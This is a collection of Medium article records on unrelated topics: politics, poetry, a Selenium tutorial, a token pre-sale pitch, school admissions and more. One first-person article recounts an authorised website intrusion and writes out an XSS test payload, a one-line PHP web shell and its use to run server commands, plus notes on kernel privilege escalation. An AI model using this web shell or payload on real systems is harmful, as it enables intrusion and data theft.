Morning Consult has a collection of charts showing the state-by-state trends in President Trump’s net approval ratings, since he was inaugurated up to January 2020. Take a guess at how many states show lower approval ratings for Trump now, compared to three years ago.
All of them. His net approval ratings are lower in all 50 states. Most states show a steep drop-off in the first few months, and then small back-and-forth fluctuations since then. Trump’s approval rating has fallen by double digits in 49 states. Idaho has the smallest net change, at six points. Trump’s ratings have fallen by 20 points or more in 16 states — including Michigan and Florida, which he barely won in 2016 and absolutely needs to hold in 2020.
Again, approval ratings are not the same as head-to-head polls. Some of these people who disapprove might still end up voting for Trump. But these are net changes over time. They indicate a massive loss of support for Trump since he was elected, across every state in the country. The numbers have been steady for three years and are not showing any signs of changing.
Premise 4 — Will the Democrats Really Show Up This Time?
There’s been a lot of recent talk about how Bernie Sanders’ supporters sat out the general election in 2016, and they’ll probably do it again in 2020. We’ll have no way of knowing unless it actually happens. But first Sanders actually has to lose the nomination. [Update: It looks like he will.]
If he wins, will there be moderate Democrats who will sit out, or vote for Trump instead? Maybe Joe Manchin. Everyone else will hold their nose and vote for Bernie, the same way moderate Republicans held their nose and voted for Trump. A lot of Christian conservatives with Biblical values voted for Trump only because they wanted more anti-abortion justices on the Supreme Court. They got their way, and now abortion rights in America are seriously endangered. When moderate Democrats look at a choice between Bernie Sanders and potentially a 7–2 conservative majority on the Supreme Court, they’ll vote for Bernie.
What if Bernie loses? Some of his supporters may sit out. It won’t be as many as last time, because they won’t be able to make the same argument about the primaries being rigged against him. The Democratic establishment is [Update: was] helping Bernie sail toward the nomination, by splitting the moderate vote among three candidates. If he loses, it’ll be because he lost it fair and square.
In 2016, Bernie voters sat out because they were more angry at Clinton than they were at Trump. In 2020, they’ll be more angry at Trump than anyone else.
In general, analysts are predicting a historically large turnout in 2020. Turnout was huge in 2018, even when Trump wasn’t on the ballot. Turnout was the highest in history for the New Hampshire primary last week. And Nevada reported huge numbers in early voting, potentially big enough to break the overall turnout record from 2008.
Conclusions: Trump Has No Path to Victory
Trump’s big problem is that he’s the one driving Democratic turnout. Democrats have been showing up to vote in ever-greater numbers for the past three years, specifically because they can’t stand having Trump as their President. They’re not united behind anyone on their own side. No Democratic candidate even has steady support from a quarter of the Democratic voters, while Trump has support from more than 90% of the Republicans. The polls will be overrun by Democrats in 2020, solely because they want to vote Trump out.
So he’s caught in a dilemma. He can take himself off the ticket, and let someone else be President. Or he can run for re-election, and get beaten by superior numbers. Those are his two choices.
In my original argument, premises 2, 3, and 4 lead directly to the first conclusion in line 5. And that conclusion along with premise 1 gives us the second conclusion: Trump will lose in 2020. | https://medium.com/the-national-discussion/if-you-really-think-trump-is-favored-in-2020-you-havent-thought-it-through-50516e2fc23f | ['Adam Powell'] | 2020-08-25 20:43:33.802000+00:00 | ['Bernie Sanders', 'Politics', 'Trump', 'Elections', 'Democracy'] |
In less than 24 hours VectorZilla Token Pre-Sale Ends! Snow! Secure your VZ tokens now! | The VectorZilla token pre-sale inching close to a successful end. You can still join our community of amazing contributors and angel investors, and receive generous bonuses.
Only two simple steps set you apart:
Step One: To buy VZT & become eligible to participate, just click on the link given below to sign-up below:
https://account.vectorzilla.io/#/signup
Sign-up and complete your KYC details
Step Two: Once you complete the signup details and verify the email id. The system will validate the KYC real time, it is quick and simple, and should not take more than 1 minute.
You will be given full access to your VectorZilla Personal Account. You can click on the invest button to view contract address and other payment options. Determine your desired amount and then make your contribution! | https://medium.com/vectorzilla/vz-presale-ens-in-24-hours-40617d0bd788 | ['Vector Zilla Pr'] | 2018-03-10 16:12:28.258000+00:00 | ['Vectorzilla', 'Blockchain', 'ICO', 'Ethereum', 'Tokensale'] |
The World of Sensations | I’ve been reborn into
The World of Sensations
Baby pink sweater
Child laughing
Brown soda pop dancing on the tongue
I find it hard to believe
How much there is to feel
~to attune to~
Have you noticed the camera angles on The Office?
One can say a lot just by zooming in
I think I’m finally able to zoom in on life
The mundane is extraordinary
The shower, makeup, hair extravaganza is pleasurable
The way I check my body in the mirror each day
for impurities and fat is saddening
But I had hardly noticed that on
AUTOPILOT
Where do we go when we exit the present moment?
They took my autonomy too many times, so
disappearing into random brain synapses and
the whims of old memories scares me the most
More than drowning
Okay, maybe not more than drowning
but it’s comparable
I’ve been reborn into
The World of Sensations
My amygdala is losing its power
so I threw out the oatmeal
that spilled in the pockets of my winter coat
For the record, it wasn’t quirky when I forgot
everything
It was really sad for me
But I’m glad we could all laugh about it at the time
I’ve always wanted to be an entertainer | https://medium.com/assemblage/the-world-of-sensations-d2c593fe2bcb | ['Blithe Anderson'] | 2020-12-04 12:51:14.803000+00:00 | ['PTSD', 'Emotions', 'Trauma Recovery', 'Poetry', 'Poetry On Medium'] |
Neutralizing the Truth! | ###The Pentagon’s Unmanned Spokesdrone
Personally, though, I always thought it was more effective when the unmanned drone was made to look like an [attractive woman](http://images.google.com/images?q=dana+perino&um=1&ie=UTF-8&sa=X&oi=image_result_group&resnum=1&ct=title). Or am I just thinking of Battlestar Galactica? | https://medium.com/minds-on-media/neutralizing-the-truth-b87fdfb4aabb | ['R. E. Warner'] | 2018-01-29 07:02:28.242000+00:00 | ['Drone', 'Those Crazy Droids', 'Dana Perino', 'Battlestar Galactica', 'Bst'] |
I’ll Cherish the Memories of the House That Built Me — Her View From Home | I always assumed my parents would have our childhood home forever. It would always be a place for me to come back to-a place of comfort and memories. But, the Zillow listing slapped me in the face. A wake-up call that I can’t hold on to things forever. Words jump out at me-Cape Cod. 4 bedrooms and 3 full baths. Square feet. Finished basement. Move-in ready. Granite countertops. These were the words used to describe the house I grew up in? Nouns. So concrete and factual and so matter of fact that I wondered if the house staring back at me was even our house. I had to change that. I had to rewrite it.
I just had to come back one last time. Ma’am, I know you don’t know me from Adam.
But that front door you have closed was always opened. Kids from the neighborhood would run in and out all day. My mom would try to scrub up the footprints, only to have another little kid trod his muddy shoes into the house. She didn’t care. She loved it and would always have a snack for everyone.
Up those stairs, that bedroom off to the left was mine. It’s where I spent hours writing and filling pages of journals and playing school with my dolls.
And I bet you didn’t know out in the front lawn, there is a patch of grass that doesn’t grow. That was the home plate for our Wiffle ball games. My dad would be the only adult playing with all the neighborhood kids. He would taunt them until the losing team would skulk off and cry. And I, the only girl, would rattle off my softball chants in a squeal that was sure to annoy rowdy boys.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Mom got ideas from HGTV for years. From HomeGoods and Pier 1 stores. Plans were made and granite was laid. And nail by nail and board by board, my mom’s dreams came alive. We had granite countertops put in, our basement finished, and our deck expanded. But I know she doesn’t remember our house for that. My friends would gather around those granite countertops, digging into snacks and laughing, after football games, for sleepovers, friendship days, Oscar parties, and our annual beer, wine, and cheese party, which would turn into a packed house and ended with someone daring a brave soul to drink the spit bucket mixed with all the beer and wine.
And down in that basement is where my brother and his friends (the bad guys) would chase my friends and me through the tunnels and the secret door. It’s where we would perform plays and have birthday parties that would turn into a game of hot potato getting out of hand between my cousins or the neighbor getting attacked by another little kid. All caught on camera, thankful that my dad behind the camera kept filming instead of stopping to intervene. And out on that side deck, an epic shot was made into the neighbor’s basketball hoop.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Right there in that living room is where we would decorate the Christmas tree.
My grandparents would come over for a ham sandwich lunch and to see all the presents we got. And in that little corner is where we replaced the big Christmas tree with a Charlie Brown tree the year my mom got cancer. And on those floors, we all laid together and watched a movie, thankful her surgery went well. Down the hallway, that bedroom was an office where the company my dad started grew from. My aunt would come every day to work, and she would bring my cousin to play with us. When that phone rang, we had to be quiet.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Outside, every summer, our yard would transform into the carnival. Right over there, by the woods was a treehouse that became the water balloon stand and next to the deck was the baseball toss. And I, by the road, would man the prize stand. After it was over, my mom would gather all of us up and march us down to Catholic Charities to hand over the money and work.
When my uncle, aunt, cousins, and grandma would visit, we had lemonade stands. Twenty-five cents for a lemonade and a pack of gum. People would come from all over to line up. As we got older, a badminton net became a permanent fixture in the yard during the summer. Friends would come over for tournaments.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
That house right next door, the Taylors live there. Their three boys now grown and moved away. In their backyard was a swimming pool. We had many volleyball games and races there.
On a summer night, we would play pickup games on their basketball court and then in the fall have a bonfire and a movie in their yard.
If you get a chance, ask them about how we killed their pet while they were away on vacation and how my dad made a neighborhood kid cry from scaring him during a campout. And when the sky got dark and the streetlight turned on, neighbors would come out to gather in our yard. The adults would talk and drink while the kids played hide-and-seek. Under the Taylor’s deck was a good place to hide.
You leave home, you move on and you do the best you can.
Whenever I got lost in this old world and forgot who I was, I would come back to this house. At first, I came back alone. Then, I brought my husband. And finally, I brought my son. Now, I will have nothing to go back to but these wonderful memories thanks to the house that built me. | https://medium.com/@laurenbarrettwrites/ill-cherish-the-memories-of-the-house-that-built-me-her-view-from-home-d88ebf13bd26 | [] | 2021-02-01 14:44:47.957000+00:00 | ['Mommy Bloggers', 'Growing Up', 'Childhood Memories', 'Nostalgia', 'Childhood'] |
The Difference Between Your Value and Knowing You’re Valuable | I’ve been in the GIS, Geospatial, and GEOINT community for 20 years now and it makes me feel old saying it. I will take the feeling old because it also means that I’ve learned and experienced a lot in those 20 years, and I look forward to the lessons and experiences of the next 20 years.
My geospatial journey started with the Marine Corps and that is without question the single greatest decision of my life other than the decision to become a father. My time the Corps was followed by experiences and opportunities with Anteon, BAE Systems, NW Systems, Esri, and most recently Boundless. Each of these professional waypoints has provided me a lifetime of lessons learned (good and bad) and shaped how and who I am as a professional, but none has had the impact (excluding the Marine Corps) that Spatial Networks has. I am forever grateful for those other opportunities, but in Spatial Networks I found something special.
I found a culture and a professional family. A family that genuinely cares about one another and cares about doing what’s best for the customer and the greater good before that of the individual. This corporate culture is a scaled up and out version of our founder’s (Tony Quartararo) personal code of conduct, and conduct referred to as “Professional Integrity.” He demands it of himself, demands it of his employees, and demands that we demand it from our own relationships. My move to Spatial Networks was valuable for many reasons, but most importantly because it has re-energized me and resulted in deeper/more mission-focused thinking than ever before and a new tagline:
Know the difference between your value and being valuable.
Every single person within an organization is both, but they all bring something different to the table. Everyone has value within their organization, and is also valuable to someone both inside and outside their organization — and that goes for the geospatial community as much as (in some cases, maybe more than) anywhere else.
Most people can tell you what their value is to their employer. Fewer people truly understand why they’re valuable.
I’ll explain the difference:
In the Marines, I provided value as a geospatial analyst. It was my job to be prepared, be precise, and explain the battlefield. I’d build a virtual world for the guys headed out there so when they arrived, it was like they’d already been there: There’s a five-story building. There’s a broken-out window on the east side of the third floor. There’s a back door where you can get out.
That was the value I brought to that role.
But when those guys completed the mission and were one step closer to going home to their families? That’s why I was valuable.
Here’s another example: Account executives provide value to their companies by establishing and maintaining relationships with their customers and bringing in revenue.
But account executives are valuable to their customers because they act as advisors and advocates. With their knowledge of the company and product, account executives are able to make recommendations to help their customers be successful and solve problems. (If their customers are not successful, they won’t be customers for long.)
So, you see the difference. But not everyone does.
Here at Spatial Networks, I don’t think our software developers truly understand how valuable they are.
They know their value: They build best-in-class software solutions to help our customers solve their problems. They come in, they write their code, and they go home. (A little oversimplification, maybe, but you get it.)
What they don’t know is exactly how their work impacts the end user.
They don’t see the decisions our customers make with the information they are able to derive from our software. They don’t see that their work — in many cases — literally saves lives.
It’s a big deal! (It’s also why I was so excited to join the team last year.)
So you can see why it’s important, as an employee, to understand more than just your value to a company. When you understand why you’re valuable, you find purpose and passion in your job and in your life. Then you not only find more joy in your work, but you have more power over your whole career.
And as a boss, you want your employees to know why they’re valuable because people who are passionate about their jobs work harder — gladly.
When everyone in an organization knows not just their value, but why they are valuable, everyone wins together! | https://blog.spatialnetworks.com/the-difference-between-your-value-and-knowing-youre-valuable-db4354448b30 | ['Brian Monheiser'] | 2019-04-03 15:01:26.582000+00:00 | ['Integrity', 'Corporate Culture', 'Military', 'Geospatial Industry', 'Geospatial'] |
How I hacked 3 websites in 15 mins | Are you under the impression that XSS vulnerabilities don’t affect the website?
I started learning about website vulnerabilities a few months back. Until a few days back, things were just till finding, sharing, and making fixes. This time I thought why not show how this works.
One of my knowns asked if I could check their website. Is there any way we can get to the server? This is an important stage before you get into some website.
Caution: Take permission for website testing and going to the server. Never test anything without permission and don’t use this for some illegal activity. Don’t be a cracker.
The answer was positive and I went ahead.
Let the game began…
Wherever you go into some website, the first step is to know about the target without doing much of the stuff.
The first move
Scanning ports using nmap
nmap — top-ports 1000 -T4 -sC mysite.com
The scan was completed in about 3 mins.
The only ports available to interact without credentials were 80/443. This wasn’t useful information. I went ahead with dummy login credentials. The first thing that comes to your mind when you see inputs is script injection. I knew that they have this vulnerability. So I went ahead just to ensure that it still exists or not. I tested it using
<img src=x onerror=’alert(“123”);’>
and it worked.
In 5 mins we found a vulnerability — the XSS vulnerability existing. But this wasn’t it. I was going through a form and saw a file upload section. Why not check Unrestricted File Upload Vulnerability! How Kind!
Opened my terminal and executed
echo “<?php system(\$_GET[‘cmd’]); ?>” > exploit.php
I tried to upload this file in that file attachment. It got uploaded, where I had expected it would stop me. In 8 mins, I had the second vulnerability. Now, it was the digging time.
Since it got uploaded, I would be there somewhere on the server. I right-clicked the file name on the file which I had uploaded and clicked copy link address and pasted it in a new tab.
GOD Mode activated
It resulted in https://mysite.com/path/XXXXX.php
This looks like our sweet shell from the browser to that server is ready.
I tried this URL: https://mysite.com/path/XXXXX.php?cmd=whoami and it loaded ‘www-data’.
~9 mins till now, we have low privileged access to the website.
The next shock when I checked this: https://mysite.com/path/XXXXX.php?cmd=ls /var/www/html
There wasn’t one but 3 or more websites hosted. Read access to all websites was available. Without any delay, I shared this with my mentor, and with his help, I went ahead with it. We tried to get the files out of the server by bringing them into the accessible location from the browser and we were successful in it. We were able to read many SQL files, backup files there(a developer knows how important are these), create files. That means we had read-write access. We tried to access the database, though it didn’t go successfully.
In 12 mins we had lots of information. This was serious! Now,
The climax
I decided to check if somehow I can get the root access. I checked
cat /etc/issue
and from here I got the OS detail. Then, I did
uname -a
and got the kernel version. Once you have these, you can get the scripts online on kernel vulnerabilities. I found one which can make me root if I could access /tmp location, which I was able to access.
It’s time to stop!
What an attack could have done:
Modify server Add some malware Make the information public available Do some fun attacks Use the server Not jokingly, rm -rf (and here Game over) Rest I leave on you
Time up! 15 mins done.
What did we get?
An XSS vulnerability after which we were sure for HTML rendering An unrestricted file upload leading to server access Able to become root
The next day I shared it with them and they fixed it.
So, never underestimate XSS or restrictions. A single miss can be deadly. | https://medium.com/@hanisha-arora/how-i-hacked-3-websites-in-15-mins-4d3533201be6 | ['Hanisha Arora'] | 2021-01-20 11:59:53.952000+00:00 | ['Cybersecurity', 'Hacking', 'Website Development', 'Website Security', 'Website Testing'] |
Bookended | Learn more. Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more
Make Medium yours. Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore | https://medium.com/a-cornered-gurl/bookended-45cad6d4269e | ['Jessica Lee Mcmillan'] | 2020-12-21 11:43:10.198000+00:00 | ['Quadrille', 'Challenge', 'Introvert', 'Pandemic', 'Poetry'] |
Gary Dranow and The Manic Emotions exemplify the tasteful authenticity of classical rock and Blues… | Gary Dranow and The Manic Emotions exemplify the tasteful authenticity of classical rock and Blues music in their new album ‘Never Give Up.’
Park City, Utah — June 11th, 2021 — Gary Dranow and The Manic Emotions is a three-piece band ready to take the listeners on an exhilarating journey through music. Having mastered the art of classic rock and authentic blues in an era of heavily auto-tuned pop music, the band stands out for its striking originality.
Telling tales of love, heartbreak, relationships, loss, and the accompanying mental struggles of such emotions, Gary Dranow and The Manic Emotions create compositions that transcend the boundaries of known genres. This is made possible through the band’s connection to its roots which brings richness to its lyrics and distinct touch to its performances.
Gary Dranow and The Manic Emotions is releasing its first album, ‘Destiny Road’, following the release of its prelude “Destiny Road — Rough Cuts”. Although the album itself has been ten years in the making, the band believes the time is just right for the world to experience its work which they had originally intended to release in the summer of 1995 using Jefferson Airplane’s old 2” 16 track machine. Even though the original plan never came to fruition as the band fought personal battles, the tracks making up ‘Destiny Road’ remain the same as they were when first conceived ten years ago. However, in order to stay true to the times and changes, Emotions decided to release the prelude to memorialize the things as they were.
With its second album titled ‘Never Give Up’ scheduled to release in the winter of 2021, Gary Dranow and The Manic Emotions is currently booking gigs and performing throughout the Greater Salt Lake City including Park City, Utah.
Check out and learn more about Gary Dranow and The Manic Emotions through their website and other links given below.
###
About:
Gary Dranow and the Manic Emotions is a three-piece band with Gary Dranow on the vocals and guitar, Bob Nellis on the drums, and Jeff Lawrence on the bass and vocals. Having worked on an album for over ten years, the band is ready to take the world by storm with renewed zeal and enthusiasm. The band members are full of vigor and excitement, and their second album is scheduled to be released soon in the winter of 2021.
Contact:
Name: Gary Dranow
Email: gary@modernskiracing.com
Phone: (801)680–6066, (435)200–9037
Links:
Twitter https://twitter.com/garydranow
YouTube https://www.youtube.com/watch?v=gUODf-9t6S4
SoundCloud https://soundcloud.com/gary-dranow
LinkedIn https://www.linkedin.com/in/gary-dranow-24795716/
Spotify https://open.spotify.com/artist/0ln6vyEEr8rYl7ZB5aJv0T
Source: ArtistPR Music Press Release
#Blues, #Rock, #SingerSongwriter, #PressRelease | https://medium.com/music-press-release/gary-dranow-and-the-manic-emotions-exemplify-the-tasteful-authenticity-of-classical-rock-and-blues-4ee06b0ba858 | [] | 2021-07-17 19:11:38.040000+00:00 | ['Blues', 'Singer Songwriter', 'Rock'] |
Police Monoculture | Many, if not most, police departments across the country have a policy of recruiting and hiring at most only slightly-above-average intelligence. Police departments, though ostensibly separate, local, and distinct, often use the same tests and the same criteria for recruits and for training. These policies are local, but deployed nationwide. They exist on the theory that exceptionally intelligent police officers will too easily become bored with the job and leave after only a few years of costly training. From walking a beat to stakeouts or simply directing traffic, the theory goes, very smart people will get tired and bored too easily.
Besides very little scientific basis for this theory, there are several fatal misprisions here. First, that highly intelligent people are helpless before boredom and have little sense of duty and diligence; This is to say that boredom is a force more powerful than diligence or discipline. Secondly, it fails to address the idea that seasoned officers of average or slightly above average intelligence teaching raw recruits of the same intellectual gifts might not be the main driver of cost in training. If you don’t have anyone of exceptional intelligence to promote, from time to time, you’ll just get more reinforcement.
The problem, of course, has nothing to do with any particular recruit or officer of average or above-average intelligence. Any sizeable group will have a large number of their personnel — perhaps even a majority — of average intelligence.
The problem is the wholesale exclusion — indeed denial — of anybody well above average or of exceptional intelligence.
When high intelligence is denied all you will get is what an average intelligence thinks is acceptable and a continually re-enforcing cycle of that average intelligence.
Monoculture
What you get is a monoculture: a complete lack of diversity where behaviours and mores that ought to be challenged, are instead adopted and propagated. That’s why Eric Garner can be asphyxiated in 2014 and George Floyd asphyxiated in 2020… Where’s the impetus to change? To get better? To do better? To even understand what better means?
Given the complexities of modern policing, a distinct and well-entrenched monoculture has a levelling effect: reducing the complexities to simplistic solutions of brute force and violence; reducing the willingness to change.
And, not for nothing, how is it that we can have a thriving genre of television, from Columbo to The Wire that portrays smart detectives chasing down the bad guys when the police in the real world isn’t that smart? I’m not saying they’re dumb. But I can’t say they are smart. (And, also not for nothing…if there’s nothing limiting the intelligence of the criminals… Why should we limit the intelligence of the police?) | https://medium.com/an-injustice/police-monoculture-e7819d8d8242 | ['Petr Swedock'] | 2020-10-21 21:17:49.786000+00:00 | ['Police', 'Workplace Culture', 'Law Enforcement', 'Community'] |
4. Page Object Model Pattern | Hello folks! We have prepared our environment so that building a test automation framework. At this stage, I am going to start discussing Page Object Model Pattern in Selenium. I highly recommend you to read the previous posts beforehand.
You can find what should you expect in this post below;
What is Page Object Model(POM)? Why we should POM? Implementation. Advantages of using POM.
1. What is Page Object Model(POM)?
Page Object Model is a design pattern that is used mostly in Web UI testing for enhancing maintenance of the test code and reducing duplication of it. Each page in the web application has to be separate class different than the others. These are the classes that contain Web Elements(Locators) of the web page, the classes include the methods which perform operations on those Web Elements and the classes are exist so that to execute corresponding page tests.
2. Why we should POM?
As I mentioned above, Selenium test projects generally are hard to be maintained. Also, there is a significant amount of duplicated line of codes. Duplicated code causes unnecessary functionality and many crazy similar page object locators. Another reason is that changing the page locators frequently. If some locator will change, you might have to adjust the locator for the new implementation. This is a considerable waste of time for the QA team. You cannot see the exact advantage of POM if you have a small script to test the login behavior of the application. Script maintenance looks easy. However, as time goes further, the test suite will grow. As you add more and more lines to your code, things become tough. Think about this. If you consumed your time to maintain your code at every change, how would you increase your test coverage?
3. Implementation
Okay, we talked about theory enough. It’s time to write some codes. I will be using PyCharm IDE to develop Page Object Model-based project. Create a directory and give a name whatever you want for the project on your local. Here is the very first window once you start to create a new project in PyCharm. First, you need to specify both the location and the project name. Then, select a project interpreter and click click button.
Creating a new POM project in PyCharm
The next step is creating separate folders for the corresponding elements. For example, Web Elements will be located under Locators folder, common actions will be in Base class, Chrome, Firefox or Explorer driver will be in Drivers, Web Page methods will be located in Pages, Testcases will be in Tests folder. You can also create a TestSuite folder so that executing your tests as a suite. Here is the project folder structure below.
The folder structure in a POM pattern
We can create python files under folders that are related actions for our Application Under Test. For creating a python file, right-click Locators folder, click “New” and create python file.
After deciding associated files, your project structure will look like this.
Python project structure
I will only talk about Login Page to be able to give a clear idea of what are we doing with Page Object Model pattern. Assume that, you will test the login functionality of a web application and need to give username and password on Login Page and click login button to enter the system.
We need to send the username and password details into related text boxes by using send_keys() function. Then, click login button to enter the Home Page then we should verify we are whether the correct page. We should consider creating 3 python classes to achieve a test based on POM; locators.py for web elements, LoginPage.py for page methods, and test_login.py for the test. We also need to create a Base class to call the Webdriver object.
base.py
base.py
locators.py
Some codes in locators.py
LoginPage.py
LoginPage.py
test_login.py
test_login.py
That’s all! You may wonder about how to gather login details. Here is the importance of Data Driven Testing. I encapsulated login details in login_details.xlsx file and used pandas library in order to fetch the username and password as easily as possible with a minimum number of codes.
4. Advantages
If the UI design of the page changes, you don’t have to update the test class implementation, rather it is enough to update the page object(locator) POM provides us creating a non-fragile test by means of reducing duplicated codes. POM makes our test code as clean as possible. Therefore, the test codes are easy to understand even if after a very long time later. POM design implementation separates the page objects and tests by achieving an abstraction.
Let’s continue with the next blog. See you there! | https://medium.com/@alipala/4-page-object-model-pattern-6167dc0b5351 | ['Ali Pala'] | 2019-10-27 20:39:57.407000+00:00 | ['Selenium', 'Test Automation', 'Page Object Model', 'Python', 'Selenium Webdriver'] |
EOS Knights holds the 1st EK. Cup! | The 1st EK. Cup — EOS Knights
When does the 1st EK. Cup start?
From Tuesday, April 23rd at 12:00(UTC) — To Friday, April 26th until 12:00(UTC); 3 days
Where will this event be held?:
You will be teleported using the EK. Cup Portal. Please refer the image below
Whom to play with?
With your 10 times stronger Knights ERIC, ORIA and SCARLLET
How to participate?
Every player start equally EK. Cup with the same condition
What is the goal of EK. Cup?
Reach the highest floor and craft ‘The Great Sword Against Death’
Reward to be claimed
50 EOS: the first account who successfully crafts and submit ‘The Great Sword Against Death’
10 EOS: Top 20 accounts who reach the highest floor
MW: Every participant get MW, based on number of floors they climb (1,000 MW is max reward)
Miscellaneous
- There will a level 1 Knight of ERIC, ORIA and SCARLLET be provided at start
- There also will be given 9,000 Dark Magic Water(DMW) at the beginning. DMW can be used for EK. Cup only!
During the event the attack of all Knights will be 10X stronger than usual
- Certain items require 4 materials. 1 out of these 4 materials can be replaced by DMW
- There is no material/item market on the event.
Attention
All materials, items, pets and DMW were used during the cup will be destroyed! | https://medium.com/eosys/eos-knights-hold-the-1st-ek-cup-d2722b7fd4f4 | [] | 2019-04-18 05:34:51.160000+00:00 | ['Eos', 'En', 'Eosio', 'Eosknights', 'Game'] |
E-Tax Solutions: #taxes2020 #taxes | e-Tax Invoice / e-Receipt
What is ETAX ?
Since 2012, the Thai Revenue Department (“RD”) has had a policy of supporting the preparation and delivery of electronic tax invoices (“e-tax invoices”) or electronic receipts (“e-receipts”) to support electronic transactions in the private sector and to increase the efficiency of electronic services (“e-services”) of the government.
How to submit ETAX invoice to RD ?
There’re rules, procedures, and conditions specified in the RD regulations. For a brief explanation, E-tax invoices and e-receipts are issued with a digital signature and an XML file that meet RD’s criteria (if not meet, the files will be rejected) and must be submitted to the RD by uploading XML files in RD website. Normally the documents that RD receive will be as follows; — Tax invoice — Receipt — Credit Note (issued to decrease the debt) — Debit Note (issued to increase the debt)
E-Tax by CODIUM provides a time saving automation solution for submitting taxes to the Thai Department of Revenue via email. We have several companies already using this software and have shown that it can be integrated seamlessly with SAP Business One (as well as other) accounting software. The software can auto submit all of the correct documents to the department of revenue every month via email.
Our E-tax current customers include: Huawai, SB-furniture, Siam@Siam, Homepro, DV, Dplus, BNG, Thai Samsung, BCH, PVP, SCB-BCM, Thai Insurance, Chodthanawat, Foodie, Ruamwattana, Piyamata, Eastern Sugar & Cane, Sakon Sathapat, JD Central, T2P, IQVIA, VS Chem, L.P.N. Development, Petronas, Kemrex, Wealth On Wellness, Gojek, Thai Reinsurance, Pezy Online.
#accounting #automation #automation #software #business #sap #development #webapplication #webappdevelopment #applicationservices #taxhelp #taxexpert | https://medium.com/c0d1um/e-tax-solutions-taxes2020-taxes-8a9d07e6d886 | ['Siwanad W'] | 2020-12-25 02:59:05.251000+00:00 | ['Accounting Software', 'Etax Services Inc', 'Accounting Services', 'Taxes', 'E Tax Invoice'] |
“A VISIT FROM SANITY CLAUSE” | ’Twas the night before Christmas and in the White House
not a creature was stirring, except for The Louse.
He sat on his gold throne, device on his knees,
Tweeting his latest insanities.
Then, from somewhere outside there arose such a clatter,
that he jumped from his duties and dropped his snack platter.
To the window he waddled and looked down to see
a red-suited figure — “Who could that be?”
Then Junior crawled in whining: “What’s all that noise?”
as Barron shrieked: “Santa! He’s bringing my toys!”
“Oh no, THAT’S not Santa! Are you dumb or just blind?
That’s old Crooked Hillary and her saggy behind!”
From her sleigh in the driveway then Hillary spoke:
“I’ve got the computers and pictures and notes,
and even the boxes of uncounted votes!
I saw you do all of the sick things you did,
and I know where you’re hiding the secrets you hid.
With the blackmail items that, for years, you’ve stocked up,
when it’s all sorted out, won’t be me who’s locked up!
Your time in the White House will soon be no more
and I’ll laugh and applaud as you’re dragged out the door!”
Then Eric unleashed such a sad, mournful sob:
“If Dad’s not The Boss, who will give me a job?”
“Shut up. Just shut up! This is not about YOU!
This is all about ME, but I know what to do!
I’ve got friends, lots of friends, the BEST friends, in fact.
They love me, they’re loyal, they won’t let me get sacked!
I have friends in high places — friends nobody knows,
friends with yuge power and yuge debts they owe!
I’m too big to fail — too powerful to touch!
I’ll be President for life — they promised that much!”
Then the pants-suited figure stood tall, straight and proud
And from out on the driveway her laughter got loud:
“President for life? — Too big to fail?
With titles like that you’ll be well-liked in jail!
With your selfish, disgusting, deplorable deeds,
and your cruelty, lies and insatiable greed,
you’ve written your future in blood on the streets,
and set it in stone with your 3 AM Tweets!
You’re a cancer — a rancid and festering sore –
a malignant, malicious, international whore!
The time has now come that the Piper be paid.
Time now that the sum of your Evil be weighed.
I thank Flynn, Guiliani, Manaforte and Ted Cruz,
and Cohen and all of your ‘Friends’ at Fox News!”
Then, reins in her hands, she hopped back on her sleigh
and uttered the words she had long wished to say:
“Great thanks to the People who dared ‘take a knee’,
and to Dreamers and Memers who refused not to see,
plus the millions of people with Soul and with Heart
who wept as you ripped this whole Nation apart.
Thanks to Mueller, Pelosi, Adam Schiff and Max Waters
and all of America’s sensible voters,
our Nightmare is over — we’re rid of that Scum
and the soulless bloodsuckers who were loyal to the Bum!”
Then she said, with a wave and a glorious grin:
“Merry Christmas to all — may the Healing begin!”
— Y.Not?! (aka Brooke Jones) | https://medium.com/@WhatifYNot/a-visit-from-hillary-clause-2c9aafe1f43c | ['Brookejones', 'Aka', 'Y.Not'] | 2019-12-05 20:34:27.967000+00:00 | ['Christmas', 'Hillary Clinton', 'Satire', 'Political Satire', 'Politics'] |
A Missed Opportunity to Plan For Equity: A Response to High School and Middle School Admissions… | A Missed Opportunity to Plan For Equity: A Response to High School and Middle School Admissions Changes in NYC
PRESS NYC affirms eliminating middle school admissions screens and demands more visionary solutions moving forward.
PRESS NYC, Parents for Responsive, Equitable, Safe Schools, is a parent collective who hold the education press and the NYC mayor accountable. We lead on CECs, build learning communities with students, write anti-racist curriculum, have expertise in the challenges of navigating the system for students with disabilities, and demand that parents are able to engage with the DOE in their language. We expect the DOE to be responsive to the communities it serves, centered on equity, & grounded in health & safety.
The Department of Education has announced that:
for the upcoming school year, and possibly beyond, all middle school admissions screens will be eliminated.
all geographic priority in high school admissions will be eliminated, including in District 2.
individual high schools will be allowed to maintain their screening policies, using grades from 6th and the beginning of 7th grades.
Thus far, no information has been released regarding admissions testing for Gifted & Talented.
In response, PRESS NYC:
supports the DOE’s elimination of screens for middle school admission for the current admissions cycle, and advocates for ending them permanently.
urges the DOE to adopt an admissions model similar to D15, pegged to district averages of students living in poverty. Or to use a transparent parent friendly algorithm like the one put forward in District 1.
applauds removing geographic priority for high school admission as a small step toward equitable enrollment, but recognizes that this action alone will not accomplish equitable enrollment.
urges the DOE to consider an admissions mechanism that will create diverse student populations in each high school (intentionally building upon the Ed-Opt method).
urges the DOE to suspend G&T testing and the SHSAT because there is no equitable way to administer tests for G&T or SHSAT without jeopardizing health and safety of our students and educators, and given that students and families have been dealing with pandemic circumstances beyond their control that have barred them from an equitable education.
“The admissions plan as announced can only achieve the goals of equitable, integrated, culturally responsive and sustaining schools if followed by subsequent announcements of policies that enable these changes to succeed.” — Yuli Hsu, 1st VP Community Education Council 14, Member of PRESS NYC
